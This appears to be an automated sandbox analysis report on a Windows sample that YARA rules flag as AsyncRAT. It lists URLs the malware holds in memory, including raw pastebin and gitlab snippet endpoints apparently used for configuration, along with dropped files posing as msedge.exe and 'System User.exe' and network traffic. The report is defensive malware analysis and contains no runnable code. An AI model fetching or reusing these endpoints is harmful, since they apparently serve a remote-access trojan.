                      Source: YgJ5inWPQO.exe, 00000002.00000002.1494569830.000001D8A93F3000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1494594655.000001D8A93F6000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1491822955.000001D8A93F6000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1487788295.000001D8A93F4000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1493147338.000001D8A93F2000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1487765708.000001D8A93EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                      Source: YgJ5inWPQO.exe, 00000002.00000002.1494569830.000001D8A93F3000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1494594655.000001D8A93F6000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1491822955.000001D8A93F6000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1487788295.000001D8A93F4000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1493147338.000001D8A93F2000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1487765708.000001D8A93EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                      Source: YgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmp, dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmp, dddd.exe, 0000000E.00000002.1731703513.0000026234172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/cmd-softworks1/a/-/snippets/4768754/raw/main/endpoint.json
                      Source: YgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmp, dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmp, dddd.exe, 0000000E.00000002.1731703513.0000026234051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/cmd-softworks1/a/-/snippets/4768756/raw/main/discord.json
                      Source: dddd.exe, 0000000E.00000002.1731703513.00000262341C9000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.0000026234167000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ncs.roblox.com/upload
                      Source: dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org
                      Source: dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.0000026234167000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262341C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
                      Source: powershell.exe, 00000014.00000002.1605494790.0000021DC04C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1733400343.0000013848664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1915994439.00000254CDE82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2145283227.0000020B90071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: YgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmp, dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmp, dddd.exe, 0000000E.00000002.1731703513.0000026234172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/pjseRvyK
                      Source: YgJ5inWPQO.exe, 00000002.00000003.1473302298.000001D8A78EA000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1496226400.000001D8A97FC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
                      Source: YgJ5inWPQO.exe, 00000002.00000002.1499325131.00007FFBAACA9000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
                      Source: dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                      Source: dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nodejs.org
                      Source: YgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmp, dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
                      Source: YgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmp, dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                      Source: YgJ5inWPQO.exe, 00000002.00000002.1499325131.00007FFBAACA9000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.python.org/psf/license/)
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: unknownHTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.8:49704 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.8:49707 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 128.116.123.3:443 -> 192.168.2.8:49708 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.20.22.46:443 -> 192.168.2.8:49709 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Yara detected AsyncRAT
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: YgJ5inWPQO.exe PID: 5352, type: MEMORYSTR

                      Operating System Destruction

                      barindex
                      Protects its processes via BreakOnTermination flag
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: 01 00 00 00 Jump to behavior

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.3.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 12.0.msedge.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000002.00000003.1479245702.000001D8A966B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000002.00000003.1485033909.000001D8A9686000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0000000C.00000000.1480505898.00000000003D2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000002.00000002.1495329200.000001D8A969D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000002.00000003.1477753556.000001D8A9689000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000002.00000003.1486802746.000001D8A968D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000002.00000003.1486429771.000001D8A9688000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\AppData\Roaming\System User.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF5810000_2_00007FF7FF581000
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF588BD00_2_00007FF7FF588BD0
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF5A69D40_2_00007FF7FF5A69D4
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF5898700_2_00007FF7FF589870
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF5A18E40_2_00007FF7FF5A18E4
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF59DF600_2_00007FF7FF59DF60
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF5988040_2_00007FF7FF598804
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF591FD00_2_00007FF7FF591FD0
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF5A97980_2_00007FF7FF5A9798
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF5917B00_2_00007FF7FF5917B0
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF599F100_2_00007FF7FF599F10
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF5A5EEC0_2_00007FF7FF5A5EEC
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF58AD1D0_2_00007FF7FF58AD1D
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF5936100_2_00007FF7FF593610
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF59E5E00_2_00007FF7FF59E5E0
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF591DC40_2_00007FF7FF591DC4
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF595DA00_2_00007FF7FF595DA0
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF5A3C800_2_00007FF7FF5A3C80
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF592C800_2_00007FF7FF592C80
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF5A09380_2_00007FF7FF5A0938
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF5A64880_2_00007FF7FF5A6488
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF5A5C700_2_00007FF7FF5A5C70
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF58A4E40_2_00007FF7FF58A4E4
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF58A34B0_2_00007FF7FF58A34B
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF591BC00_2_00007FF7FF591BC0
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF59DACC0_2_00007FF7FF59DACC
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF5A09380_2_00007FF7FF5A0938
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF5981540_2_00007FF7FF598154
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF5A411C0_2_00007FF7FF5A411C
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF593A140_2_00007FF7FF593A14
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF5921D40_2_00007FF7FF5921D4
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF5919B40_2_00007FF7FF5919B4
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF5810002_2_00007FF7FF581000
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF5A69D42_2_00007FF7FF5A69D4
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF5898702_2_00007FF7FF589870
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF5A18E42_2_00007FF7FF5A18E4
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF59DF602_2_00007FF7FF59DF60
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF5988042_2_00007FF7FF598804
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF591FD02_2_00007FF7FF591FD0
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF5A97982_2_00007FF7FF5A9798
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF5917B02_2_00007FF7FF5917B0
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF599F102_2_00007FF7FF599F10
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF5A5EEC2_2_00007FF7FF5A5EEC
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF58AD1D2_2_00007FF7FF58AD1D
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF5936102_2_00007FF7FF593610
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF59E5E02_2_00007FF7FF59E5E0
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF591DC42_2_00007FF7FF591DC4
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF595DA02_2_00007FF7FF595DA0
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF5A3C802_2_00007FF7FF5A3C80
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF592C802_2_00007FF7FF592C80
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF5A09382_2_00007FF7FF5A0938
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF5A64882_2_00007FF7FF5A6488
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF5A5C702_2_00007FF7FF5A5C70
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF58A4E42_2_00007FF7FF58A4E4
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF58A34B2_2_00007FF7FF58A34B
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF591BC02_2_00007FF7FF591BC0
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF588BD02_2_00007FF7FF588BD0
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF59DACC2_2_00007FF7FF59DACC
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF5A09382_2_00007FF7FF5A0938
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF5981542_2_00007FF7FF598154
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF5A411C2_2_00007FF7FF5A411C
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF593A142_2_00007FF7FF593A14
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF5921D42_2_00007FF7FF5921D4
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF5919B42_2_00007FF7FF5919B4
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FFBBB6073FC2_2_00007FFBBB6073FC
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FFBBB6023B02_2_00007FFBBB6023B0
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FFBBB605F002_2_00007FFBBB605F00
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FFBBB6012B02_2_00007FFBBB6012B0
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FFBBB602F702_2_00007FFBBB602F70
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FFBBB608F502_2_00007FFBBB608F50
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FFBBB601A002_2_00007FFBBB601A00
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FFBBB6055D02_2_00007FFBBB6055D0
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FFBBB6046502_2_00007FFBBB604650
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FFBBB6019202_2_00007FFBBB601920
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FFBBB60F5242_2_00007FFBBB60F524
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FFBBB6377E82_2_00007FFBBB6377E8
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FFBBB633DC02_2_00007FFBBB633DC0
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FFBBB632DA02_2_00007FFBBB632DA0
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FFBBB63C8902_2_00007FFBBB63C890
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FFBBB6360602_2_00007FFBBB636060
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FFBBB633B202_2_00007FFBBB633B20
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FFBBCD483002_2_00007FFBBCD48300
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FFBBCD463A02_2_00007FFBBCD463A0
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeCode function: 12_2_00007FFB49896E7212_2_00007FFB49896E72
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeCode function: 12_2_00007FFB4989129012_2_00007FFB49891290
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeCode function: 12_2_00007FFB498960C612_2_00007FFB498960C6
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeCode function: 12_2_00007FFB4989171912_2_00007FFB49891719
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeCode function: 12_2_00007FFB498920F112_2_00007FFB498920F1
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeCode function: 12_2_00007FFB4989108A12_2_00007FFB4989108A
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeCode function: 14_2_00007FFB498C6DB014_2_00007FFB498C6DB0
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeCode function: 14_2_00007FFB498D254014_2_00007FFB498D2540
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeCode function: 14_2_00007FFB498C492814_2_00007FFB498C4928
                      Source: C:\Users\user\AppData\Roaming\System User.exeCode function: 38_2_00007FFB498A171938_2_00007FFB498A1719
                      Source: C:\Users\user\AppData\Roaming\System User.exeCode function: 38_2_00007FFB498A103838_2_00007FFB498A1038
                      Source: C:\Users\user\AppData\Roaming\System User.exeCode function: 38_2_00007FFB498A20F138_2_00007FFB498A20F1
                      Source: C:\Users\user\AppData\Roaming\System User.exeCode function: 39_2_00007FFB498B171939_2_00007FFB498B1719
                      Source: C:\Users\user\AppData\Roaming\System User.exeCode function: 39_2_00007FFB498B103839_2_00007FFB498B1038
                      Source: C:\Users\user\AppData\Roaming\System User.exeCode function: 39_2_00007FFB498B20F139_2_00007FFB498B20F1
                      Source: C:\Users\user\AppData\Roaming\System User.exeCode function: 40_2_00007FFB4989171940_2_00007FFB49891719
                      Source: C:\Users\user\AppData\Roaming\System User.exeCode function: 40_2_00007FFB4989103840_2_00007FFB49891038
                      Source: C:\Users\user\AppData\Roaming\System User.exeCode function: 40_2_00007FFB498920F140_2_00007FFB498920F1
                      Source: C:\Users\user\AppData\Roaming\System User.exeCode function: 42_2_00007FFB498D171942_2_00007FFB498D1719
                      Source: C:\Users\user\AppData\Roaming\System User.exeCode function: 42_2_00007FFB498D103842_2_00007FFB498D1038
                      Source: C:\Users\user\AppData\Roaming\System User.exeCode function: 42_2_00007FFB498D20F142_2_00007FFB498D20F1
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\_MEI4322\VCRUNTIME140.dll 36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: String function: 00007FF7FF582910 appears 34 times
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: String function: 00007FF7FF582710 appears 104 times
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6476 -s 2224
                      Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: YgJ5inWPQO.exe, 00000000.00000003.1464730716.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs YgJ5inWPQO.exe
                      Source: YgJ5inWPQO.exe, 00000000.00000003.1465060554.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs YgJ5inWPQO.exe
                      Source: YgJ5inWPQO.exe, 00000000.00000003.1463734787.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs YgJ5inWPQO.exe
                      Source: YgJ5inWPQO.exe, 00000000.00000003.1464879729.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs YgJ5inWPQO.exe
                      Source: YgJ5inWPQO.exe, 00000000.00000003.1464219398.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs YgJ5inWPQO.exe
                      Source: YgJ5inWPQO.exe, 00000000.00000003.1472115949.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs YgJ5inWPQO.exe
                      Source: YgJ5inWPQO.exe, 00000000.00000003.1463949860.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs YgJ5inWPQO.exe
                      Source: YgJ5inWPQO.exe, 00000000.00000003.1471950558.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs YgJ5inWPQO.exe
                      Source: YgJ5inWPQO.exeBinary or memory string: OriginalFilename vs YgJ5inWPQO.exe
                      Source: YgJ5inWPQO.exe, 00000002.00000003.1479245702.000001D8A966B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe4 vs YgJ5inWPQO.exe
                      Source: YgJ5inWPQO.exe, 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs YgJ5inWPQO.exe
                      Source: YgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe4 vs YgJ5inWPQO.exe
                      Source: YgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs YgJ5inWPQO.exe
                      Source: YgJ5inWPQO.exe, 00000002.00000003.1485033909.000001D8A9686000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe4 vs YgJ5inWPQO.exe
                      Source: YgJ5inWPQO.exe, 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs YgJ5inWPQO.exe
                      Source: YgJ5inWPQO.exe, 00000002.00000003.1477651096.000001D8A9479000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs YgJ5inWPQO.exe
                      Source: YgJ5inWPQO.exe, 00000002.00000002.1507486913.00007FFBAAEE2000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython313.dll. vs YgJ5inWPQO.exe
                      Source: YgJ5inWPQO.exe, 00000002.00000002.1495329200.000001D8A969D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe4 vs YgJ5inWPQO.exe
